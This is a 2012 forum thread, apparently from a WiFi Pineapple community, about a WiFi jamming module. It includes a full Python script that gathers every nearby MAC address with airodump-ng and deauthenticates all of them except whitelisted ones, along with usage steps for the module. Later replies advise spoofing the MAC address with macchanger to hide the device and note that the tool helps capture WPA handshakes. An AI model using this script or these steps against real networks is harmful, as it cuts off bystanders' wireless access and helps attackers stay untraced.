Whistle Master Posted May 20, 2012 Share Posted May 20, 2012 (edited) Hi there !I wanted to share with you my last module for the pineapple: a WiFi Jammer ;)Features- Using deauth with aireplay- Whitelist / Blacklist based on regexp- AutostartScreenshots Simplified Usage - Select the interface to be used from WLAN interface drop-down list (e.g. wlan1). - Click on Start Monitor. - Monitor interface drop-down list will be refreshed (e.g. mon0). - Click on Whitelist tab and click on Refresh link to show APs around and click on APs to be added to your whitelist which will be NOT DeAuth'ed. - Click on Start link next to WiFi Jammer disabled Troubleshooting procedure 1. No APs are found in the Whitelist or Blacklist Select the interface from WLAN interface drop-down list (e.g. wlan1) and click on Auto to disable and re-enable the interface. Then try again. 2. No APs are DeAuth'ed Select the interface from WLAN interface drop-down list (e.g. wlan1) and click on Auto to disable and re-enable the interface. Then try again. Edited July 13, 2013 by Whistle Master Quote Link to comment Share on other sites More sharing options...
Radau Posted May 20, 2012 Share Posted May 20, 2012 So you can allow certain connections through with the whitelist, while constantly deauthing others? Quote Link to comment Share on other sites More sharing options...
Whistle Master Posted May 20, 2012 Author Share Posted May 20, 2012 (edited) Yes, you can add AP(s) in the whitelist which won't be deAuth'ed, while the others will be deAuth'ed constantly :) EDIT: I added also a blacklist to bring more flexibility to the jammer. Edited May 20, 2012 by Whistle Master Quote Link to comment Share on other sites More sharing options...
bobbyb1980 Posted May 20, 2012 Share Posted May 20, 2012 I was working on something extremely similar a few weeks ago but I don't have one of the new pineapples to test it on. I used regular expressions too. I'll post it here and perhaps you could integrate it to the pineapple, no web interface though : P """ This script is designed to deauthenticate all macs found in the air with the exception of whitelisted ones. Input known good client and AP and all other MACs on 2.4 ghz in the area are denied service. """ import subprocess import time import sys import re import sys iface = 'mon0' # List of macs to deauth todeauth = [] # Don't deauth mymac = '' myap = '' searchmac = re.compile(r'([a-fA-F0-9]{2}[:|\-]){5}[a-fA-F0-9]{2}') # Takes all macs from airodump-ng stderr and puts them into list def grabMacs(): proc = subprocess.Popen(['airodump-ng', '%s' % iface], stdout = subprocess.PIPE, stderr = subprocess.PIPE, executable='/usr/sbin/airodump-ng') print('one second. im thinking...') time.sleep(10) for x in proc.stderr: a = searchmac.search(x) if a: todeauth.append(x[a.start():a.end()]) print(x[a.start():a.end()]) elif len(todeauth) > 15: break sys.stdout.flush() # Takes all macs from airodump-ng output csv file and puts into list def snabMacs(): subprocess.Popen(['airodump-ng', '-w', 'test1234-01.csv', iface], stderr = subprocess.PIPE) print('collecting MACs for 10 seconds...') time.sleep(10) file = open('test1234-01.csv-01.csv') for x in file: a = searchmac.search(x) if a: print(x[a.start():a.end()]) todeauth.append(x[a.start():a.end()]) # Deauth all targets in todeauth list from grabMacs or snabMacs # function. Will remove known good macs as mymac and myap input. def massDeauth(todeauth, mymac, myap): if myap in todeauth: todeauth.remove(myap) print('known good ap was successfully removed from deauth list') elif mymac in todeauth: todeauth.remove(mymac) print('known good mac was sucessfully removed from deauth list') elif len(todeauth) > 0: print('starting deauths') for x in todeauth: proc = subprocess.Popen(['aireplay-ng', '-0','0','-a', x, iface], stdout = subprocess.PIPE, stderr = subprocess.PIPE) print('deauthing...') proc.terminate() snabMacs() time.sleep(3.5) massDeauth(todeauth, mymac, myap) Quote Link to comment Share on other sites More sharing options...
RebelCork Posted May 20, 2012 Share Posted May 20, 2012 Do we need an extra wi-fi card/ pineapple to both block/use karma? Quote Link to comment Share on other sites More sharing options...
Whistle Master Posted May 21, 2012 Author Share Posted May 21, 2012 I was working on something extremely similar a few weeks ago but I don't have one of the new pineapples to test it on. I used regular expressions too. I'll post it here and perhaps you could integrate it to the pineapple, no web interface though : P Thanks for your input. However, I made everything in shell scripts to keep CPU / memory footprint as low as possible :) Do we need an extra wi-fi card/ pineapple to both block/use karma? For the moment yes, because aireplay-ng does not work properly and you have to switch off / on the monitor interface before use it. But then, karma won't work anymore until the next reboot. Quote Link to comment Share on other sites More sharing options...
bobbyb1980 Posted May 21, 2012 Share Posted May 21, 2012 Cool whistlemaster. Never tried it using bash. This week I am going to start working on one that uses pylorcon to send the deauth packets so there is no dependency on aireplay-ng. Quote Link to comment Share on other sites More sharing options...
Whistle Master Posted May 21, 2012 Author Share Posted May 21, 2012 · Hidden by Whistle Master, May 25, 2012 - No reason given Hidden by Whistle Master, May 25, 2012 - No reason given I have a version ready to be tested, for those interested, please find send me a PM. Link to comment
Whistle Master Posted May 29, 2012 Author Share Posted May 29, 2012 First version is out ;) Quote Link to comment Share on other sites More sharing options...
Whistle Master Posted June 17, 2012 Author Share Posted June 17, 2012 Last version nows add the possibility to use another wifi adapter. Quote Link to comment Share on other sites More sharing options...
telot Posted June 17, 2012 Share Posted June 17, 2012 Just what the doctor (and 2.3.1!) ordered! Thanks for the update WM! telot Quote Link to comment Share on other sites More sharing options...
Anton Posted June 17, 2012 Share Posted June 17, 2012 Would i be right in saying that you can't browse the web whilst the router is jamming even if the routers address is added to the white list? Also the jammer does jam its own ap by default right? Awesome tool btw, thanks. - Anton Quote Link to comment Share on other sites More sharing options...
Dazzle Posted June 18, 2012 Share Posted June 18, 2012 Thank you very much for even more ways to use Jasager (when I finally get my USB>UART adapter to flash my ALFA) How effective is it? I can imagine that only the A/Ps with the best signals will get a deauth. Quote Link to comment Share on other sites More sharing options...
Whistle Master Posted June 18, 2012 Author Share Posted June 18, 2012 Would i be right in saying that you can't browse the web whilst the router is jamming even if the routers address is added to the white list? Also the jammer does jam its own ap by default right? Awesome tool btw, thanks. - Anton APs on the whitelist are not DeAuth'ed, so you should still be able to browse internet through AP not DeAuth'ed. By default, everything is DeAuth'ed :) Thank you very much for even more ways to use Jasager (when I finally get my USB>UART adapter to flash my ALFA) How effective is it? I can imagine that only the A/Ps with the best signals will get a deauth. APs in sight of the pineapple will be DeAuth'ed. Quote Link to comment Share on other sites More sharing options...
PineDominator Posted June 19, 2012 Share Posted June 19, 2012 hey WM great module:-D sorry I couldn't test last week:-( 2 things the link start monitor is cut, box needs to be wider I think. and after starting the module using the NHA mon0 "btw works great and I was able to successfully whitelist the pineapple" when you press stop it's still running? ps. one thing I would love to see is a deauth mode that is controllable? as in run every 10 minutes deauthing only 1 to 5 packets so that I don't piss off too many people, also maybe there is a command one could pass using the button module to run jammer the one time/for 1 minute just a thought. Quote Link to comment Share on other sites More sharing options...
Whistle Master Posted June 19, 2012 Author Share Posted June 19, 2012 2 things the link start monitor is cut, box needs to be wider I think. and after starting the module using the NHA mon0 "btw works great and I was able to successfully whitelist the pineapple" when you press stop it's still running? Could you please send me a screenshot of the problem ? I'm testing my modules only with Firefox, assuming not too many people are using IE :-P The stop button should stop everything, maybe with a little delay, because of the auto-refresh running which send continuously requests. ps. one thing I would love to see is a deauth mode that is controllable? as in run every 10 minutes deauthing only 1 to 5 packets so that I don't piss off too many people, also maybe there is a command one could pass using the button module to run jammer the one time/for 1 minute just a thought. Nice idea! I will have a look to add some settings :) Quote Link to comment Share on other sites More sharing options...
PineDominator Posted June 19, 2012 Share Posted June 19, 2012 Could you please send me a screenshot of the problem ? I'm testing my modules only with Firefox, assuming not too many people are using IE :-P The stop button should stop everything, maybe with a little delay, because of the auto-refresh running which send continuously requests. Nice idea! I will have a look to add some settings :) I am using firefox too v13.0.1 well it says it's stopped but my phone will continue to get deauthed, I left it for just over a minute, then stopped the monitor interface and that ended deauthing but I would imagine It's still running Quote Link to comment Share on other sites More sharing options...
Whistle Master Posted June 19, 2012 Author Share Posted June 19, 2012 I am using firefox too v13.0.1 well it says it's stopped but my phone will continue to get deauthed, I left it for just over a minute, then stopped the monitor interface and that ended deauthing but I would imagine It's still running Could you do a quick test: start the module from the web interface, then ssh to your pineapple and issue the following commands: ps auxww ps auxww | grep jammer.sh | grep -v -e grep | grep -v -e php Then stop the module from the web interface and issue the same above commands from ssh and post all the output. Thanks ;) Quote Link to comment Share on other sites More sharing options...
Whistle Master Posted June 19, 2012 Author Share Posted June 19, 2012 A new version will be out soon with new functionalities to control the jammer: sleeping time & number of deauths to send. Quote Link to comment Share on other sites More sharing options...
NullNull Posted June 19, 2012 Share Posted June 19, 2012 A new version will be out soon with new functionalities to control the jammer: sleeping time & number of deauths to send. Perfect for automaticly capturing WPA handshake's :D Quote Link to comment Share on other sites More sharing options...
unitex Posted July 12, 2012 Share Posted July 12, 2012 Is this module available for mk3? or maybe it can be easily ported. Quote Link to comment Share on other sites More sharing options...
Sebkinne Posted July 12, 2012 Share Posted July 12, 2012 Is this module available for mk3? or maybe it can be easily ported. No. It could theoretically be ported but the module system is not available on the MK3 and may not ever fully be. I am still hoping to bring out one last version of the MK3 firmware - it just takes a lot of time. Best, Sebkinne Quote Link to comment Share on other sites More sharing options...
pyth0n Posted July 16, 2012 Share Posted July 16, 2012 does this fake the mac address before sending deauth packets out? Good tool, however, just want to make sure that it hides the correct pineapple identity.. Quote Link to comment Share on other sites More sharing options...
Whistle Master Posted July 16, 2012 Author Share Posted July 16, 2012 No it doesn't but if you use macchanger before, it will do the trick ;) Quote Link to comment Share on other sites More sharing options...
condor Posted July 18, 2012 Share Posted July 18, 2012 how about a short tutorial? I can't seem to get this one working. I can, however, use my netbook and deauth my router. Just think it would be cool to be able to do it all from the pineapple. I assume WhistleMaster has it going. Oh, to be a guru of helmholtz resonation. I can't even get the damn awus 036h to work with my pineapples. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.